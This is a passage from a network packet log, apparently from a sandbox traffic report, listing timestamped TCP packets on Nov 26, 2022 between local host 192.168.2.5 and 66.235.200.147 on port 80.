Nov 26, 2022 11:17:42.513421059 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.513442039 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.513443947 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.513463974 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.513485909 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.513506889 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.513509989 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.513528109 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.513528109 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.513533115 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.513554096 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.513556957 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.513572931 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.513576031 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.513597012 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.513602018 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.513618946 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.513619900 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.513641119 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.513645887 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.513663054 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.513664007 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.513684034 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.513705969 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.513708115 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.513727903 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.513744116 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.513744116 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.513751984 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.513763905 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.513773918 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.513778925 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.513794899 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.513797045 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.513822079 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.513824940 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.513844967 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.513853073 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.513866901 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.513875008 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.513889074 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.513897896 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.513911963 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.513914108 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.513931036 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.513932943 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.513957977 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.513967991 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.513993025 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.514017105 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.514019966 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.514019966 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.514045000 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.514058113 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.514070988 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.514091015 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.514096022 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.514107943 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.514116049 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.514134884 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.514154911 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.514178991 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.514204979 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.514230013 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.514234066 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.514255047 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.514278889 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.514303923 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.514328003 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.514336109 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.514336109 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.514336109 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.514353037 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.514358044 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.514379025 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.514385939 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.514403105 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.514404058 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.514420033 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.514430046 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.514450073 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.514456987 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.514478922 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.514482021 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.514498949 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.514507055 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.514529943 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.514534950 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.514560938 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.514570951 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.514585972 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.514585972 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.514610052 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.514610052 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.514627934 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.514636040 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.514657021 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.514663935 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.514687061 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.514688015 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.514712095 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.514719963 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.514735937 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.514736891 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.514753103 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.514760971 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.514782906 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.514786959 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.514805079 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.514815092 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.514837027 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.514839888 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.514853954 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.514864922 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.514894962 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.514911890 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.514925003 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.514938116 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.514961958 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.514974117 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.514987946 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.514990091 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.515014887 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.515036106 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.515042067 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.515069008 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.515083075 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.515091896 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.515116930 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.515125036 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.515141010 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.515150070 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.515167952 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.515171051 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.515183926 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.515192986 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.515218019 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.515218019 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.515244961 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.515269041 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.515286922 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.515294075 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.515320063 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.515325069 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.515341043 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.515343904 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.515367985 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.515369892 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.515391111 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.515393972 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.515409946 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.515420914 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.515434980 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.515461922 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.515466928 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.515466928 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.515486956 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.515491962 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.515511990 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.515517950 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.515533924 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.515537024 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.515561104 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.515584946 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.515608072 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.515609026 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.515624046 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.515634060 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.515657902 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.515682936 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.515682936 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.515703917 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.515710115 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.515734911 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.515742064 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.515758991 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.515784025 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.515809059 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.515810966 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.515810966 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.515810966 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.515832901 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.515849113 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.515857935 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.515876055 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.515882015 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.515892029 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.515908003 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.515912056 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.515930891 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.515932083 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.515950918 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.515957117 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.515980959 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.515981913 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.516000032 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.516006947 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.516026020 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.516030073 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.516057014 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.516087055 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.516134977 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.516160965 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.516185999 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.516194105 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.516211987 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.516230106 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.516237020 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.516247988 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.516262054 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.516283989 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.516283989 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.516285896 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.516309977 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.516328096 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.516335011 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.516341925 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.516359091 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.516371012 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.516382933 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.516385078 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.516402960 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.516422033 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.516441107 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.516458988 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.516477108 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.516494036 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.516516924 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.516541958 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.516549110 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.516566038 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.516585112 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.516591072 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.516611099 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.516616106 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.516634941 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.516639948 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.516665936 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.516668081 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.516683102 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.516690016 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.516715050 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.516727924 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.516732931 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.516742945 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.516758919 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.516761065 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.516782999 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.516782999 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.516801119 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.516808987 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.516829014 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.516834021 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.516860008 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.516872883 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.516884089 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.516890049 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.516902924 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.516910076 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.516928911 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.516935110 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.516957998 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.516972065 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.516983986 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.516988039 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.517004967 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.517009974 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.517036915 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.517049074 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.517049074 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.517091990 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.517117977 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.517137051 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.517142057 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.517153025 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.517167091 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.517173052 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.517189980 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.517191887 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.517216921 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.517240047 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.517241955 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.517266989 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.517272949 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.517292023 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.517316103 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.517319918 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.517334938 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.517339945 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.517360926 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.517365932 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.517386913 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.517391920 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.517416000 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.517416000 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.517436028 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.517441988 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.517461061 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.517467976 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.517488003 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.517492056 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.517508984 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.517515898 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.517539024 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.517541885 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.517566919 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.517574072 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.517591953 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.517612934 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.517612934 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.517616034 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.517641068 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.517663956 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.517664909 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.517688990 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.517693043 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.517713070 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.517714977 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.517738104 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.517750978 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.517764091 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.517767906 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.517788887 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.517813921 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.517822981 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.517838955 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.517838955 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.517864943 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.517869949 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.517883062 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.517889023 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.517910004 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.517913103 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.517936945 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.517937899 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.517962933 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.517976999 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.517976999 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.517986059 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.518002987 CET	49707	80	192.168.2.5	66.235.200.147
